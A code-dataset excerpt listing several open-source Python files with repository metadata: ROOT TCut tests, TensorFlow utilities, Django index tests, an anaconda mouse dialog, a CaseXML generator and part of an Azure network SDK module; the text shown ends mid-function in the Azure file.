repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990
values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15
values |
|---|---|---|---|---|---|
OstapHEP/ostap | ostap/trees/tests/test_trees_cuts.py | 1 | 2761 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# =============================================================================
# @file ostap/trees/tests/test_trees_cuts.py
# Copyright (c) Ostap developers.
# =============================================================================
""" Test module for ostap/trees/cuts.py.
"""
# =============================================================================
# logging
# =============================================================================
from ostap.logger.logger import getLogger
if '__main__' == __name__ : logger = getLogger ( 'test_trees_cuts' )
else : logger = getLogger ( __name__ )
# =============================================================================
import ROOT
import ostap.trees.cuts
def test_cuts():
    """Exercise the TCut operator algebra installed by ``ostap.trees.cuts``.

    Covers inversion, arithmetic with plain numbers (both operand orders),
    augmented arithmetic, boolean algebra between cuts, and boolean algebra
    between a cut and a plain string.  All results are only logged; the one
    hard check is that an empty cut inverts to a truthy value.
    """
    ## inversion: an empty cut must behave as a logical ``zero''
    a = ROOT.TCut()
    assert ~a, "Empty cut must be ``zero'': ``%s''" % a
    a = ROOT.TCut('pt/p')
    logger.info ( 'a = %s' % a )
    ## arithmetic with plain numbers, both operand orders
    for label, value in ( ( 'a+1' , a + 1 ) ,
                          ( 'a-1' , a - 1 ) ,
                          ( 'a*1' , a * 1 ) ,
                          ( 'a/1' , a / 1 ) ,
                          ( '1+a' , 1 + a ) ,
                          ( '1-a' , 1 - a ) ,
                          ( '1*a' , 1 * a ) ,
                          ( '1/a' , 1 / a ) ) :
        logger.info ( '%s = %s' % ( label , value ) )
    ## augmented arithmetic, each on a fresh copy of ``a``
    tmp = ROOT.TCut(a)
    tmp += 1
    logger.info ( '%s %s' % ( 'a += 1' , tmp ) )
    tmp = ROOT.TCut(a)
    tmp -= 1
    logger.info ( '%s %s' % ( 'a -= 1' , tmp ) )
    tmp = ROOT.TCut(a)
    tmp *= 1
    logger.info ( '%s %s' % ( 'a *= 1' , tmp ) )
    tmp = ROOT.TCut(a)
    tmp /= 1
    logger.info ( '%s %s' % ( 'a /= 1' , tmp ) )
    ## boolean algebra between two cuts
    b = ROOT.TCut('pt>p')
    c = ROOT.TCut('x>4' )
    logger.info ( 'b,c = %s, %s' % ( b , c ) )
    logger.info ( '%s = %s ' % ( 'b&c' , b & c ) )
    logger.info ( '%s = %s ' % ( 'b|c' , b | c ) )
    tmp = ROOT.TCut(b)
    tmp &= c
    logger.info ( '%s %s ' % ( 'b&=c' , tmp ) )
    tmp = ROOT.TCut(b)
    tmp |= c
    logger.info ( '%s %s ' % ( 'b|=c' , tmp ) )
    ## boolean algebra between a cut and a plain string expression
    q = 'z<y'
    logger.info ( 'b,q = %s, %s' % ( b , q ) )
    logger.info ( '%s = %s ' % ( 'b&q' , b & q ) )
    logger.info ( '%s = %s ' % ( 'b|q' , b | q ) )
    logger.info ( '%s = %s ' % ( 'q&b' , q & b ) )
    logger.info ( '%s = %s ' % ( 'q|b' , q | b ) )
    tmp = ROOT.TCut(b)
    tmp &= q
    logger.info ( '%s %s ' % ( 'b&=q' , tmp ) )
    tmp = ROOT.TCut(b)
    tmp |= q
    logger.info ( '%s %s ' % ( 'b|=q' , tmp ) )
# =============================================================================
# Run the cut-algebra checks when this module is executed as a script.
if '__main__' == __name__ :
    test_cuts ()
# =============================================================================
# The END
# =============================================================================
| bsd-3-clause |
ppwwyyxx/tensorflow | tensorflow/python/eager/backprop_util.py | 8 | 1335 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Shared utilities related to backprop."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import tensor_util
def IsTrainable(tensor_or_dtype):
  """Returns True if gradients may flow for the given tensor or dtype.

  Args:
    tensor_or_dtype: either a tensor-like object (its `dtype` attribute is
      read) or anything `dtypes.as_dtype` accepts.

  Returns:
    A Python bool: True iff the base dtype is one of the floating, complex,
    resource or variant dtypes listed below.
  """
  candidate = (tensor_or_dtype.dtype if tensor_util.is_tensor(tensor_or_dtype)
               else tensor_or_dtype)
  base = dtypes.as_dtype(candidate).base_dtype
  # Resource and variant dtypes are deliberately included alongside the
  # floating/complex dtypes in the trainable set.
  trainable_dtypes = (dtypes.float16, dtypes.float32, dtypes.float64,
                      dtypes.complex64, dtypes.complex128,
                      dtypes.resource, dtypes.variant)
  return base in trainable_dtypes
| apache-2.0 |
felixjimenez/django | tests/indexes/tests.py | 40 | 1585 | from django.core.management.color import no_style
from django.db import connection, connections, DEFAULT_DB_ALIAS
from django.test import TestCase
from django.utils.unittest import skipUnless
from .models import Article
class IndexesTests(TestCase):
    """Checks the SQL index statements generated for the test models."""

    def test_index_together(self):
        """index_together on Article yields exactly one index statement."""
        connection = connections[DEFAULT_DB_ALIAS]
        index_sql = connection.creation.sql_indexes_for_model(Article, no_style())
        self.assertEqual(len(index_sql), 1)

    @skipUnless(connections[DEFAULT_DB_ALIAS].vendor == 'postgresql',
                "This is a postgresql-specific issue")
    def test_postgresql_text_indexes(self):
        """Test creation of PostgreSQL-specific text indexes (#12234)"""
        from .models import IndexedArticle
        connection = connections[DEFAULT_DB_ALIAS]
        index_sql = connection.creation.sql_indexes_for_model(IndexedArticle, no_style())
        self.assertEqual(len(index_sql), 5)
        self.assertIn('("headline" varchar_pattern_ops)', index_sql[1])
        self.assertIn('("body" text_pattern_ops)', index_sql[3])
        # unique=True and db_index=True should only create the varchar-specific
        # index (#19441).
        self.assertIn('("slug" varchar_pattern_ops)', index_sql[4])

    # NOTE(review): this decorator previously read ``connection.vendor`` while
    # its sibling used ``connections[DEFAULT_DB_ALIAS].vendor``; both name the
    # default connection, so the spelling is unified here for consistency.
    @skipUnless(connections[DEFAULT_DB_ALIAS].vendor == 'postgresql',
                "This is a postgresql-specific issue")
    def test_postgresql_virtual_relation_indexes(self):
        """Test indexes are not created for related objects"""
        connection = connections[DEFAULT_DB_ALIAS]
        index_sql = connection.creation.sql_indexes_for_model(Article, no_style())
        self.assertEqual(len(index_sql), 1)
| bsd-3-clause |
jbedorf/tensorflow | tensorflow/contrib/distributions/python/ops/bijectors/invert.py | 35 | 4257 | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Invert bijector."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.ops.distributions import bijector
from tensorflow.python.util import deprecation
__all__ = [
"Invert",
]
class Invert(bijector.Bijector):
  """Bijector which inverts another Bijector.

  Example Use: [ExpGammaDistribution (see Background & Context)](
  https://reference.wolfram.com/language/ref/ExpGammaDistribution.html)
  models `Y=log(X)` where `X ~ Gamma`.

  ```python
  exp_gamma_distribution = TransformedDistribution(
    distribution=Gamma(concentration=1., rate=2.),
    bijector=bijector.Invert(bijector.Exp()))
  ```
  """

  @deprecation.deprecated(
      "2018-10-01",
      "The TensorFlow Distributions library has moved to "
      "TensorFlow Probability "
      "(https://github.com/tensorflow/probability). You "
      "should update all references to use `tfp.distributions` "
      "instead of `tf.contrib.distributions`.",
      warn_once=True)
  def __init__(self, bijector, validate_args=False, name=None):
    """Creates a `Bijector` which swaps the meaning of `inverse` and `forward`.

    Note: An inverted bijector's `inverse_log_det_jacobian` is often more
    efficient if the base bijector implements `_forward_log_det_jacobian`. If
    `_forward_log_det_jacobian` is not implemented then the following code is
    used:

    ```python
    y = self.inverse(x, **kwargs)
    return -self.inverse_log_det_jacobian(y, **kwargs)
    ```

    Args:
      bijector: Bijector instance.
      validate_args: Python `bool` indicating whether arguments should be
        checked for correctness.
      name: Python `str`, name given to ops managed by this object.

    Raises:
      NotImplementedError: if `bijector` is not injective (inversion is only
        well-defined for injective maps).
    """
    if not bijector._is_injective:  # pylint: disable=protected-access
      raise NotImplementedError(
          "Invert is not implemented for non-injective bijectors.")
    self._bijector = bijector
    # Forward/inverse metadata of the wrapped bijector is swapped, mirroring
    # the swap of the transformations themselves below.
    super(Invert, self).__init__(
        graph_parents=bijector.graph_parents,
        forward_min_event_ndims=bijector.inverse_min_event_ndims,
        inverse_min_event_ndims=bijector.forward_min_event_ndims,
        is_constant_jacobian=bijector.is_constant_jacobian,
        validate_args=validate_args,
        dtype=bijector.dtype,
        name=name or "_".join(["invert", bijector.name]))

  def _forward_event_shape(self, input_shape):
    """Forward shape is the wrapped bijector's inverse shape."""
    return self.bijector._inverse_event_shape(input_shape)  # pylint: disable=protected-access

  def _forward_event_shape_tensor(self, input_shape):
    """Tensor variant of `_forward_event_shape`."""
    return self.bijector._inverse_event_shape_tensor(input_shape)  # pylint: disable=protected-access

  def _inverse_event_shape(self, output_shape):
    """Inverse shape is the wrapped bijector's forward shape."""
    return self.bijector._forward_event_shape(output_shape)  # pylint: disable=protected-access

  def _inverse_event_shape_tensor(self, output_shape):
    """Tensor variant of `_inverse_event_shape`."""
    return self.bijector._forward_event_shape_tensor(output_shape)  # pylint: disable=protected-access

  @property
  def bijector(self):
    """The wrapped (un-inverted) bijector."""
    return self._bijector

  def _forward(self, x, **kwargs):
    # Forward of the inversion is the inverse of the wrapped bijector.
    return self.bijector._inverse(x, **kwargs)  # pylint: disable=protected-access

  def _inverse(self, y, **kwargs):
    # Inverse of the inversion is the forward of the wrapped bijector.
    return self.bijector._forward(y, **kwargs)  # pylint: disable=protected-access

  def _inverse_log_det_jacobian(self, y, **kwargs):
    # Jacobians swap along with the transformations.
    return self.bijector._forward_log_det_jacobian(y, **kwargs)  # pylint: disable=protected-access

  def _forward_log_det_jacobian(self, x, **kwargs):
    return self.bijector._inverse_log_det_jacobian(x, **kwargs)  # pylint: disable=protected-access
| apache-2.0 |
sergey-senozhatsky/anaconda-11-vlan-support | textw/mouse_text.py | 1 | 3460 | #
# mouse_text.py: text mode mouse selection dialog
#
# Copyright 2000-2002 Red Hat, Inc.
#
# This software may be freely redistributed under the terms of the GNU
# library public license.
#
# You should have received a copy of the GNU Library Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
from snack import *
from constants_text import *
from rhpl.translate import _
class MouseDeviceWindow:
    """Text-mode dialog asking which serial device a serial mouse is on."""

    def __call__(self, screen, mouse):
        devices = { _("/dev/ttyS0 (COM1 under DOS)") : "ttyS0",
                    _("/dev/ttyS1 (COM2 under DOS)") : "ttyS1",
                    _("/dev/ttyS2 (COM3 under DOS)") : "ttyS2",
                    _("/dev/ttyS3 (COM4 under DOS)") : "ttyS3" }
        # Only serial mice need a device selection; anything else skips
        # this dialog entirely.
        current = mouse.getDevice()
        if not current or current[0:4] != "ttyS":
            return INSTALL_NOOP
        labels = devices.keys()
        labels.sort()
        # Preselect the entry matching the currently configured device
        # (falls back to the first entry when nothing matches).
        default = 0
        for position, label in enumerate(labels):
            if devices[label] == current:
                default = position
                break
        (button, result) = ListboxChoiceWindow(screen, _("Device"),
                _("What device is your mouse located on?"), labels,
                [ TEXT_OK_BUTTON, TEXT_BACK_BUTTON ], help = "mousedevice", default = default )
        if button == TEXT_BACK_CHECK:
            return INSTALL_BACK
        mouse.setDevice(devices[labels[result]])
        return INSTALL_OK
class MouseWindow:
    """Text-mode dialog for picking the mouse model and 3-button emulation."""

    def listcb(self):
        # Listbox selection callback: toggle the emulation checkbox to the
        # default recorded for the highlighted mouse.
        # NOTE(review): index 3 of the mouse tuple presumably flags whether
        # 3-button emulation should default to on -- confirm against
        # mouse.available()'s tuple layout.
        if self.mice[self.micenames[self.l.current()]][3]:
            self.c.setValue("*")
        else:
            self.c.setValue(" ")

    def __call__(self, screen, mouse):
        """Show the selection dialog; returns INSTALL_OK/BACK/NOOP."""
        # XXX ewt changed this and we can't figure out why -- we always
        # want to display this dialog so that you can turn on 3 button emu
        # if mouse.probed(): return
        self.mice = mouse.available ()
        mice = self.mice.keys ()
        mice.sort ()
        self.micenames = mice
        (default, emulate) = mouse.get ()
        # Sun mice have no selectable alternatives, so skip the dialog.
        if default == "Sun - Mouse":
            return INSTALL_NOOP
        default = mice.index (default)
        bb = ButtonBar(screen, [TEXT_OK_BUTTON, TEXT_BACK_BUTTON])
        t = TextboxReflowed(40,
                _("Which model mouse is attached to this computer?"))
        l = Listbox(8, scroll = 1, returnExit = 0)
        # listcb reads self.l / self.c, so both must be set before the
        # callback can fire.
        self.l = l
        key = 0
        for amouse in mice:
            l.append(_(amouse), key)
            key = key + 1
        l.setCurrent(default)
        l.setCallback (self.listcb)
        c = Checkbox(_("Emulate 3 Buttons?"), isOn = emulate)
        self.c = c
        g = GridFormHelp(screen, _("Mouse Selection"), "mousetype", 1, 4)
        g.add(t, 0, 0)
        g.add(l, 0, 1, padding = (0, 1, 0, 1))
        g.add(c, 0, 2, padding = (0, 0, 0, 1))
        g.add(bb, 0, 3, growx = 1)
        rc = g.runOnce()
        button = bb.buttonPressed(rc)
        if button == TEXT_BACK_CHECK:
            return INSTALL_BACK
        choice = l.current()
        emulate = c.selected()
        mouse.set(mice[choice], emulate)
        oldDev = mouse.getDevice()
        if (oldDev):
            # Keep the existing device when both old and new are serial
            # ports (or identical); otherwise switch to the new device.
            newDev = mouse.available()[mice[choice]][2]
            if ((oldDev[0:4] == "ttyS" and newDev[0:4] == "ttyS") or
                (oldDev == newDev)):
                pass
            else:
                mouse.setDevice(newDev)
        return INSTALL_OK
| gpl-2.0 |
benrudolph/commcare-hq | corehq/ex-submodules/casexml/apps/case/xml/generator.py | 2 | 6350 | from casexml.apps.case.xml import V1, V2, V3, check_version, V2_NAMESPACE
from xml.etree import ElementTree
import logging
from dimagi.utils.parsing import json_format_datetime, json_format_date
def safe_element(tag, text=None):
    """Shortcut for building an ElementTree element, optionally with text.

    NOTE: copied from the phone's XML module.  A falsy ``text`` value
    (None, '', 0) leaves the element's text unset.
    """
    element = ElementTree.Element(tag)
    if text:
        element.text = unicode(text)
    return element
def date_to_xml_string(date):
    """Render ``date`` via json_format_date; a falsy date yields ''."""
    if not date:
        return ''
    return json_format_date(date)
def get_dynamic_element(key, val):
    """
    Gets an element from a key/value pair assumed to be pulled from
    a case object (usually in the dynamic properties).

    A dict value may carry '#text' for the node text and '@'-prefixed
    keys for attributes; any other value is coerced to unicode text.
    """
    element = ElementTree.Element(key)
    if isinstance(val, dict):
        element.text = unicode(val.get('#text', ''))
        element.attrib = dict((name[1:], unicode(val[name]))
                              for name in val.keys()
                              if name and name.startswith("@"))
    else:
        # assume the value is usable as a string and hope for the best
        element.text = unicode(val)
    return element
class CaseXMLGeneratorBase(object):
    """Base class for version-specific CaseXML generators.

    The breakdown of functionality here is a little sketchy, but basically
    everything that changed between v1 and v2 is split into an overridable
    method; the remainder lives here to stay as DRY as possible.
    """

    def __init__(self, case):
        self.case = case

    def _ni(self):
        # Used below in place of real abstract methods to force overrides.
        raise NotImplementedError("That method must be overridden by subclass!")

    def get_root_element(self):
        self._ni()

    def get_create_element(self):
        return safe_element("create")

    def get_update_element(self):
        return safe_element("update")

    def get_close_element(self):
        return safe_element("close")

    def get_index_element(self, index):
        """Build an index element tagged with the referenced case type."""
        index_element = safe_element(index.identifier, index.referenced_id)
        index_element.attrib = {"case_type": index.referenced_type}
        return index_element

    def get_case_type_element(self):
        self._ni()

    def get_user_id_element(self):
        return safe_element("user_id", self.case.user_id)

    def get_case_name_element(self):
        return safe_element("case_name", self.case.name)

    def get_external_id_element(self):
        return safe_element("external_id", self.case.external_id)

    def add_base_properties(self, element):
        element.append(self.get_case_type_element())
        element.append(self.get_case_name_element())

    def add_custom_properties(self, element):
        # Dynamic properties are emitted one child element per key/value.
        for prop_key, prop_value in self.case.dynamic_case_properties():
            element.append(get_dynamic_element(prop_key, prop_value))

    def add_indices(self, element):
        self._ni()
class V1CaseXMLGenerator(CaseXMLGeneratorBase):
    """Emits CaseXML in the legacy v1 schema."""

    def get_root_element(self):
        """Build the <case> root; in v1 id and date are child elements."""
        root = safe_element("case")
        # moved to attrs in v2
        root.append(safe_element("case_id", self.case.get_id))
        root.append(safe_element("date_modified",
                                 json_format_datetime(self.case.modified_on)))
        return root

    def get_case_type_element(self):
        # v1 spells this "case_type_id" (renamed to "case_type" in v2)
        return safe_element("case_type_id", self.case.type)

    def add_base_properties(self, element):
        for child in (self.get_case_type_element(),
                      self.get_user_id_element(),      # moved in v2
                      self.get_case_name_element(),
                      self.get_external_id_element()):  # deprecated in v2
            element.append(child)

    def add_custom_properties(self, element):
        if self.case.owner_id:
            element.append(safe_element('owner_id', self.case.owner_id))
        super(V1CaseXMLGenerator, self).add_custom_properties(element)

    def add_indices(self, element):
        # intentionally a no-op: v1 payloads cannot carry indices
        if self.case.indices:
            logging.info("Tried to add indices to version 1 CaseXML restore. This is not supported. "
                         "The case id is %s, domain %s." % (self.case.get_id, self.case.domain))

    def add_attachments(self, element):
        # v1 payloads carry no attachment block
        pass
class V2CaseXMLGenerator(CaseXMLGeneratorBase):
    """Emits CaseXML in the v2 schema (also used for v3 payloads)."""

    def get_root_element(self):
        """Build the <case> root; v2 moves ids/date into attributes."""
        root = safe_element("case")
        attributes = {
            "xmlns": V2_NAMESPACE,
            "case_id": self.case.get_id,
            "user_id": self.case.user_id or '',
            "date_modified": json_format_datetime(self.case.modified_on)}
        root.attrib = attributes
        return root

    def get_case_type_element(self):
        # case_type_id --> case_type
        return safe_element("case_type", self.case.type)

    def add_base_properties(self, element):
        super(V2CaseXMLGenerator, self).add_base_properties(element)
        # owner id introduced in v2; default to user_id for 1.3 compatibility
        element.append(safe_element('owner_id', self.case.owner_id or self.case.user_id))

    def add_custom_properties(self, element):
        # external_id was demoted from a base property in v1 to a plain
        # property here
        if self.case.external_id:
            element.append(safe_element('external_id', self.case.external_id))
        super(V2CaseXMLGenerator, self).add_custom_properties(element)

    def add_indices(self, element):
        if not self.case.indices:
            return
        index_elem = safe_element("index")
        children = [self.get_index_element(i) for i in self.case.indices]
        children.sort(key=lambda elem: elem.tag)
        for child in children:
            index_elem.append(child)  # .extend() only works in python 2.7
        element.append(index_elem)

    def add_attachments(self, element):
        if not self.case.case_attachments:
            return
        attachment_elem = safe_element("attachment")
        for name, attachment in self.case.case_attachments.items():
            child = safe_element(name)
            # moved to attrs in v2
            child.attrib = {
                "src": self.case.get_attachment_server_url(name),
                "from": "remote"
            }
            attachment_elem.append(child)
        element.append(attachment_elem)
def get_generator(version, case):
    """Return a CaseXML generator instance for ``case`` matching ``version``.

    Propagates whatever ``check_version`` raises for unsupported versions.
    """
    check_version(version)
    generator_class = GENERATOR_MAP[version]
    return generator_class(case)
# Dispatch table from CaseXML version constant to its generator class.
# V3 is currently served by the V2 generator.
GENERATOR_MAP = {
    V1: V1CaseXMLGenerator,
    V2: V2CaseXMLGenerator,
    V3: V2CaseXMLGenerator
}
| bsd-3-clause |
Azure/azure-sdk-for-python | sdk/network/azure-mgmt-network/azure/mgmt/network/v2019_02_01/aio/operations/_route_filter_rules_operations.py | 1 | 28520 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RouteFilterRulesOperations:
"""RouteFilterRulesOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2019_02_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
    """Store the pipeline client, configuration and (de)serializers."""
    self._config = config
    self._client = client
    self._deserialize = deserializer
    self._serialize = serializer
async def _delete_initial(
    self,
    resource_group_name: str,
    route_filter_name: str,
    rule_name: str,
    **kwargs
) -> None:
    """Send the initial DELETE request for a route filter rule.

    Long-running-operation polling is handled by ``begin_delete``; this
    helper only issues the first request and validates the status code.
    """
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2019-02-01"

    # Construct URL
    url = self._delete_initial.metadata['url']  # type: ignore
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
        'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]

    request = self._client.delete(url, query_parameters, header_parameters)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # 200/202/204 are all acceptable: the delete may complete synchronously
    # or be accepted for asynchronous processing.
    if response.status_code not in [200, 202, 204]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    if cls:
        return cls(pipeline_response, None, {})

_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'}  # type: ignore
async def begin_delete(
    self,
    resource_group_name: str,
    route_filter_name: str,
    rule_name: str,
    **kwargs
) -> AsyncLROPoller[None]:
    """Deletes the specified rule from a route filter.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param route_filter_name: The name of the route filter.
    :type route_filter_name: str
    :param rule_name: The name of the rule.
    :type rule_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :keyword str continuation_token: A continuation token to restart a poller from a saved state.
    :keyword polling: Pass in True if you'd like the AsyncARMPolling polling method,
     False for no polling, or your own initialized polling object for a personal polling strategy.
    :paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
    :keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
    :return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
    :rtype: ~azure.core.polling.AsyncLROPoller[None]
    :raises ~azure.core.exceptions.HttpResponseError:
    """
    polling = kwargs.pop('polling', True)  # type: Union[bool, AsyncPollingMethod]
    cls = kwargs.pop('cls', None)  # type: ClsType[None]
    lro_delay = kwargs.pop(
        'polling_interval',
        self._config.polling_interval
    )
    cont_token = kwargs.pop('continuation_token', None)  # type: Optional[str]
    # Only issue the initial request when not resuming from a saved token.
    if cont_token is None:
        raw_result = await self._delete_initial(
            resource_group_name=resource_group_name,
            route_filter_name=route_filter_name,
            rule_name=rule_name,
            cls=lambda x,y,z: x,
            **kwargs
        )

    kwargs.pop('error_map', None)
    kwargs.pop('content_type', None)

    def get_long_running_output(pipeline_response):
        # Delete returns no body; just honor a custom ``cls`` callback.
        if cls:
            return cls(pipeline_response, None, {})

    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
        'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }

    # Final state of the delete LRO is read from the 'location' header.
    if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'location'}, path_format_arguments=path_format_arguments, **kwargs)
    elif polling is False: polling_method = AsyncNoPolling()
    else: polling_method = polling
    if cont_token:
        return AsyncLROPoller.from_continuation_token(
            polling_method=polling_method,
            continuation_token=cont_token,
            client=self._client,
            deserialization_callback=get_long_running_output
        )
    else:
        return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)

begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'}  # type: ignore
async def get(
    self,
    resource_group_name: str,
    route_filter_name: str,
    rule_name: str,
    **kwargs
) -> "_models.RouteFilterRule":
    """Gets the specified rule from a route filter.

    :param resource_group_name: The name of the resource group.
    :type resource_group_name: str
    :param route_filter_name: The name of the route filter.
    :type route_filter_name: str
    :param rule_name: The name of the rule.
    :type rule_name: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: RouteFilterRule, or the result of cls(response)
    :rtype: ~azure.mgmt.network.v2019_02_01.models.RouteFilterRule
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.RouteFilterRule"]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2019-02-01"
    accept = "application/json"

    # Construct URL
    url = self.get.metadata['url']  # type: ignore
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
        'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    request = self._client.get(url, query_parameters, header_parameters)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    if response.status_code not in [200]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    deserialized = self._deserialize('RouteFilterRule', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})

    return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/routeFilters/{routeFilterName}/routeFilterRules/{ruleName}'}  # type: ignore
async def _create_or_update_initial(
    self,
    resource_group_name: str,
    route_filter_name: str,
    rule_name: str,
    route_filter_rule_parameters: "_models.RouteFilterRule",
    **kwargs
) -> "_models.RouteFilterRule":
    """Send the initial PUT request for creating/updating a rule.

    Long-running-operation polling is handled by ``begin_create_or_update``;
    this helper only issues the first request and deserializes the body.
    """
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.RouteFilterRule"]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))
    api_version = "2019-02-01"
    content_type = kwargs.pop("content_type", "application/json")
    accept = "application/json"

    # Construct URL
    url = self._create_or_update_initial.metadata['url']  # type: ignore
    path_format_arguments = {
        'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
        'routeFilterName': self._serialize.url("route_filter_name", route_filter_name, 'str'),
        'ruleName': self._serialize.url("rule_name", rule_name, 'str'),
        'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
    }
    url = self._client.format_url(url, **path_format_arguments)

    # Construct parameters
    query_parameters = {}  # type: Dict[str, Any]
    query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')

    # Construct headers
    header_parameters = {}  # type: Dict[str, Any]
    header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
    header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')

    body_content_kwargs = {}  # type: Dict[str, Any]
    body_content = self._serialize.body(route_filter_rule_parameters, 'RouteFilterRule')
    body_content_kwargs['content'] = body_content
    request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
    pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
    response = pipeline_response.http_response

    # 200 = updated existing rule, 201 = created a new one.
    if response.status_code not in [200, 201]:
        map_error(status_code=response.status_code, response=response, error_map=error_map)
        raise HttpResponseError(response=response, error_format=ARMErrorFormat)

    if response.status_code == 200:
        deserialized = self._deserialize('RouteFilterRule', pipeline_response)

    if response.status_code == 201:
